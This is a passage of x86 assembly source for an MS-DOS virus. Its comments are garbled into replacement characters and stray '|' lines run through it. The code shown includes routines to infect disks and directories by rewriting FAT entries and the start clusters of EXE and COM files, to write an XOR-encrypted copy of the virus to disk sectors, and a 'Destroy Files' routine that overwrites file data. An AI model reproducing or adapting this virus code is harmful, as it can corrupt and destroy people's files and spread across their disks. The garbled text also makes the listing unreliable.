mov word ptr cs:StartSector+3,ax ;ࠧ<><E0A0A7><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
pop ax
|
|
|
|
|
|
sub ax,di
|
|
|
|
|
|
xor dx,dx
|
|
|
|
|
|
div cx
|
|
|
|
|
|
inc ax
|
|
|
|
|
|
|
|
|
|
|
|
push es
|
|
|
|
|
|
pop ds
|
|
|
|
|
|
|
|
|
|
|
|
FatSec1: mov word ptr [bx+14h],01h ;<3B><>⠥<EFBFBD> <20><><EFBFBD><E1ABA5><EFBFBD><EFBFBD> ᥪ<><E1A5AA><EFBFBD> FAT
|
|
|
|
|
|
mov word ptr [bx+12h],01h
|
|
|
|
|
|
mov byte ptr [bx+2],04h
|
|
|
|
|
|
call OrigDrive
|
|
|
|
|
|
lds si,[bx+0eh] ;DS:SI : 㪠<>뢠<EFBFBD><EBA2A0> <20><> <20><><EFBFBD>⠭<EFBFBD><E2A0AD><EFBFBD>
|
|
|
|
|
|
;ᥪ<><E1A5AA><EFBFBD>
|
|
|
|
|
|
push bp
|
|
|
|
|
|
|
|
|
|
|
|
mov bp,ax ;BP : <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
cmp ax,0ff6h ;<3B><><EFBFBD> 16 <20><>⮢<EFBFBD><E2AEA2> FAT?
|
|
|
|
|
|
jae Fat16Bit ;<3B> <20><><EFBFBD> <20>த<EFBFBD><E0AEA4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
More12Bit: mov ax,bp ;<3B><>।<EFBFBD><E0A5A4><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ᬥ饭<E1ACA5><E9A5AD> <20><><EFBFBD>
|
|
|
|
|
|
mov cx,03h ;<3B><><EFBFBD><E1ABA5><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>᪠
|
|
|
|
|
|
mul cx
|
|
|
|
|
|
shr ax,01h
|
|
|
|
|
|
|
|
|
|
|
|
mov di,ax ;DI : <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> FAT <20>
|
|
|
|
|
|
add di,si ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
FatSecSize: sub di,100h
|
|
|
|
|
|
mov ax,bp
|
|
|
|
|
|
test ax,01h ;<3B><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?ͻ
|
|
|
|
|
|
mov ax,[di] ;AX : <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> FAT <20>
|
|
|
|
|
|
jnz Chet ;<3B> <20><><EFBFBD> <20>த<EFBFBD><E0AEA4><EFBFBD><EFBFBD><EFBFBD><EFBFBD> �ͼ
|
|
|
|
|
|
|
|
|
|
|
|
and ax,0fffh ;<3B><><EFBFBD>㫨<EFBFBD><E3ABA8> <20><><EFBFBD><EFBFBD>訥 4 <20><><EFBFBD><EFBFBD>
|
|
|
|
|
|
jmp GoOn
|
|
|
|
|
|
|
|
|
|
|
|
Chet: mov cl,04h ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> 4 <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
shl ax,cl
|
|
|
|
|
|
jmp GoOn
|
|
|
|
|
|
|
|
|
|
|
|
GoOn: cmp ax,0ff7h ;<3B><><EFBFBD> <20><><EFBFBD>宩 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ( BAD)
|
|
|
|
|
|
je Bad12Bit ;<3B> <20><><EFBFBD> <20>த<EFBFBD><E0AEA4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
test bp,01h ;<3B><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
jnz ChetCluster ;<3B><><EFBFBD> - <20>த<EFBFBD><E0AEA4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
or ax,0fffh ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><E1ABA5><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov [di],ax ;<3B> 楯<>窥 ( EOF)
|
|
|
|
|
|
jmp Contin
|
|
|
|
|
|
|
|
|
|
|
|
ChetCluster: mov dx,0fffh
|
|
|
|
|
|
mov cl,04h
|
|
|
|
|
|
shl dx,cl
|
|
|
|
|
|
or ax,dx ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><E1ABA5><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov [di],ax ;<3B> 楯<>窥 ( EOF)
|
|
|
|
|
|
jmp Contin
|
|
|
|
|
|
|
|
|
|
|
|
Rest: jmp Fuck
|
|
|
|
|
|
|
|
|
|
|
|
More16Bit: mov ax,bp
|
|
|
|
|
|
Fat16Bit: mov di,ax
|
|
|
|
|
|
add di,si
|
|
|
|
|
|
sub di,word ptr cs:FatSecSize+2
|
|
|
|
|
|
mov ax,[di] ;AX : 16 <20><>⮢<EFBFBD><E2AEA2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> FAT
|
|
|
|
|
|
cmp ax,0fff7h ;<3B><><EFBFBD> <20><><EFBFBD>宩 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?
|
|
|
|
|
|
je Bad16Bit ;<3B><><EFBFBD> - <20>த<EFBFBD><E0AEA4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov ax,0ffffh ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><E1ABA5><EFBFBD><EFBFBD> <20>
|
|
|
|
|
|
mov [di],ax ;楯<>窥 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ( EOF)
|
|
|
|
|
|
jmp Contin
|
|
|
|
|
|
|
|
|
|
|
|
Bad16Bit: call bad ;<3B><><EFBFBD><EFBFBD><EFBFBD> <20>।<EFBFBD><E0A5A4><EFBFBD>騩 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
jmp More16Bit ;<3B><EFBFBD><E0AEA2><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
Bad12Bit: call bad ;<3B><><EFBFBD><EFBFBD><EFBFBD> <20>।<EFBFBD><E0A5A4><EFBFBD>騩 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
jmp More12Bit ;<3B><EFBFBD><E0AEA2><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
Contin: mov word ptr cs:Location+1,bp
|
|
|
|
|
|
pop bp ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> FAT <20><> <20><><EFBFBD><EFBFBD>
|
|
|
|
|
|
push es
|
|
|
|
|
|
pop ds
|
|
|
|
|
|
|
|
|
|
|
|
call Write
|
|
|
|
|
|
|
|
|
|
|
|
push es
|
|
|
|
|
|
push cs
|
|
|
|
|
|
push cs
|
|
|
|
|
|
pop ds
|
|
|
|
|
|
pop es
|
|
|
|
|
|
|
|
|
|
|
|
mov si,100h ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov di,offset VirusEnd
|
|
|
|
|
|
mov cx,1024
|
|
|
|
|
|
rep movsb
|
|
|
|
|
|
|
|
|
|
|
|
Again: mov ax,40h ;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>砩<EFBFBD><E7A0A9><EFBFBD> <20><>
|
|
|
|
|
|
mov es,ax
|
|
|
|
|
|
mov di,6ch
|
|
|
|
|
|
mov ax,word ptr es:[di]
|
|
|
|
|
|
|
|
|
|
|
|
cmp ax,00h ;<3B><> ࠢ<><E0A0A2> <20><><EFBFBD><EFBFBD>
|
|
|
|
|
|
je Again ;<3B><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><>㣮<EFBFBD> <20><>
|
|
|
|
|
|
|
|
|
|
|
|
mov word ptr cs:VirusEnd+7,ax ;<3B><><EFBFBD>࠭<EFBFBD><E0A0AD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD>
|
|
|
|
|
|
mov word ptr cs:Key+1,ax ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E0AEA2>
|
|
|
|
|
|
|
|
|
|
|
|
mov di,offset VirusEnd ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E0AEA2><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
add di,14
|
|
|
|
|
|
mov cx,1010
|
|
|
|
|
|
Key: mov ax,00h ;<3B><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><E0AEA2> ( <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|
|
|
|
|
Coding: xor word ptr [di],ax
|
|
|
|
|
|
inc di
|
|
|
|
|
|
loop Coding
|
|
|
|
|
|
|
|
|
|
|
|
pop es
|
|
|
|
|
|
push es
|
|
|
|
|
|
pop ds
|
|
|
|
|
|
|
|
|
|
|
|
mov word ptr [bx+0eh],offset VirusEnd
|
|
|
|
|
|
mov word ptr [bx+10h],cs ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E0AEA2><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
StartSector: mov word ptr [bx+14h],14h ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov word ptr [bx+12h],02h
|
|
|
|
|
|
call Write
|
|
|
|
|
|
|
|
|
|
|
|
Fuck: push es ;<3B><><EFBFBD><EFBFBD>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
pop ds
|
|
|
|
|
|
std
|
|
|
|
|
|
mov cx,0bh
|
|
|
|
|
|
mov di,bx
|
|
|
|
|
|
add di,20
|
|
|
|
|
|
Load: pop ax
|
|
|
|
|
|
stosw
|
|
|
|
|
|
loop Load
|
|
|
|
|
|
ret ;<3B><><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
InfectDisk endp
|
|
|
|
|
|
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B> *** Infect or Disinfect Directory *** <20>
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
ChangeSector proc near
|
|
|
|
|
|
xor dx,dx
|
|
|
|
|
|
mov ax,[bx+12h] ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>⢮ ᥪ<><E1A5AA>
|
|
|
|
|
|
Bytes: mov cx,10h ;CX : ࠧ<><E0A0A7><EFBFBD> ᥪ<><E1A5AA><EFBFBD><EFBFBD> ( <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|
|
|
|
|
mul cx
|
|
|
|
|
|
mov di,ax ;DI : ࠧ<><E0A0A7><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
lds si,[bx+0eh] ;DS:SI : <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD>묨
|
|
|
|
|
|
add di,si ;DS:DI : <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
xor cx,cx ;<3B>ਧ<EFBFBD><E0A8A7><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
push ds ;<3B><><EFBFBD>࠭<EFBFBD><E0A0AD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
push si
|
|
|
|
|
|
|
|
|
|
|
|
call InfectSector ;<3B><>ࠧ<EFBFBD><E0A0A7><EFBFBD> <20><>⠫<EFBFBD><E2A0AB>
|
|
|
|
|
|
jcxz NoInfect ;<3B><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>⠫<EFBFBD><E2A0AB>?
|
|
|
|
|
|
call Write ;<3B><> - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
NoInfect: pop si ;<3B><><EFBFBD><EFBFBD>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
pop ds
|
|
|
|
|
|
inc cl ;<3B>ਧ<EFBFBD><E0A8A7><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B><> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9><EFBFBD>
|
|
|
|
|
|
call InfectSector ;<3B>뫥<EFBFBD><EBABA5><EFBFBD><EFBFBD> <20><>⠫<EFBFBD><E2A0AB>
|
|
|
|
|
|
ret ;<3B><><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
ChangeSector endp
|
|
|
|
|
|
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B> *** Infect or Disinfect Files *** <20>
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
InfectSector proc near
|
|
|
|
|
|
More: mov ax,[si+8] ;AX : <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20>㪢<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>७<EFBFBD><E0A5AD>
|
|
|
|
|
|
cmp ax,'XE' ;<3B><><EFBFBD> EXE- 䠩<>?
|
|
|
|
|
|
jne COM ;<3B><><EFBFBD> <20><EFBFBD><E0AEA2><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
cmp [si+0ah],al
|
|
|
|
|
|
je Infect
|
|
|
|
|
|
COM: cmp ax,'OC' ;<3B><><EFBFBD> COM- 䠩<>?
|
|
|
|
|
|
jne NextFile ;<3B><><EFBFBD> - <20><><EFBFBD><EFBFBD><EFBFBD> <><E1ABA5><EFBFBD>騩 䠩<>
|
|
|
|
|
|
cmp byte ptr [si+0ah],'M'
|
|
|
|
|
|
jne NextFile
|
|
|
|
|
|
|
|
|
|
|
|
Infect: cmp word ptr [si+28],1024 ;<3B><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 1024 <20><><EFBFBD><EFBFBD><EFBFBD>?
|
|
|
|
|
|
jb NextFile ;<3B><> - <20><><EFBFBD><EFBFBD><EFBFBD> <><E1ABA5><EFBFBD>騩 䠩<>
|
|
|
|
|
|
test byte ptr [si+0bh],1ch ;<3B><><EFBFBD> <20><>४<EFBFBD><E0A5AA><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD>⥬<EFBFBD><E2A5AC><EFBFBD>
|
|
|
|
|
|
;䠩<>
|
|
|
|
|
|
jnz NextFile ;<3B><> - <20><><EFBFBD><EFBFBD><EFBFBD> <><E1ABA5><EFBFBD>騩 䠩<>
|
|
|
|
|
|
test cl,cl ;<3B><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD>?
|
|
|
|
|
|
jnz Disinfect ;<3B><> - <20><>ࠧ<EFBFBD><E0A0A7><EFBFBD> 䠩<>
|
|
|
|
|
|
|
|
|
|
|
|
Location: mov ax,714 ;AX : <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ᮤ<>ঠ騩 <20><><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;( <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|
|
|
|
|
cmp ax,[si+1ah] ;<3B><><EFBFBD> 䠩<> <20><>ࠦ<EFBFBD><E0A0A6>?
|
|
|
|
|
|
je NextFile ;<3B><> - <20><><EFBFBD><EFBFBD><EFBFBD> <><E1ABA5><EFBFBD>騩 䠩<>
|
|
|
|
|
|
xchg ax,[si+1ah] ;<3B><>ࠧ<EFBFBD><E0A0A7><EFBFBD> 䠩<>, AX : <20><><EFBFBD><EFBFBD>⮢<EFBFBD><E2AEA2>
|
|
|
|
|
|
xor ax,666h ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9>
|
|
|
|
|
|
mov [si+12h],ax ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DOS
|
|
|
|
|
|
inc ch ;<3B>ਧ<EFBFBD><E0A8A7><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>⠫<EFBFBD><E2A0AB><EFBFBD>
|
|
|
|
|
|
jmp NextFile ;<3B><><EFBFBD><EFBFBD><EFBFBD> <><E1ABA5><EFBFBD>騩 䠩<>
|
|
|
|
|
|
|
|
|
|
|
|
Disinfect: xor ax,ax
|
|
|
|
|
|
xchg ax,[si+12h] ;AX : <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>⮢<EFBFBD><E2AEA2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
xor ax,666h ;<3B><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9>
|
|
|
|
|
|
mov [si+1ah],ax ;<3B>뫥<EFBFBD><EBABA5><EFBFBD><EFBFBD> 䠩<>
|
|
|
|
|
|
|
|
|
|
|
|
NextFile: add si,20h ;<3B><><EFBFBD><EFBFBD><EFBFBD> <><E1ABA5><EFBFBD>饣<EFBFBD> 䠩<><E4A0A9>
|
|
|
|
|
|
cmp di,si
|
|
|
|
|
|
jne More
|
|
|
|
|
|
ret
|
|
|
|
|
|
InfectSector endp
|
|
|
|
|
|
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B> *** Destroy Files *** <20>
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
DestroyFile proc near
|
|
|
|
|
|
push es
|
|
|
|
|
|
push cs
|
|
|
|
|
|
pop ds
|
|
|
|
|
|
les di,es:[bx+0eh] ;ES:DI : <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov si,offset CopyRight ;DS:SI : <20><><EFBFBD><EFBFBD><EFBFBD> <20><>ப<EFBFBD> <20> <20><><EFBFBD><EFBFBD>ଠ<EFBFBD>.
|
|
|
|
|
|
mov cx,120 ;CX : <20><><EFBFBD><EFBFBD><EFBFBD> <20><>ப<EFBFBD>
|
|
|
|
|
|
rep movsb ;<3B><><EFBFBD><EFBFBD>⮦<EFBFBD><E2AEA6><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
pop es
|
|
|
|
|
|
ret ;<3B><><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
DestroyFile endp
|
|
|
|
|
|
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B> *** Write to Disk *** <20>
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
Write proc near
|
|
|
|
|
|
mov ah,es:[bx+2] ;<3B><><EFBFBD>࠭塞 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DOS
|
|
|
|
|
|
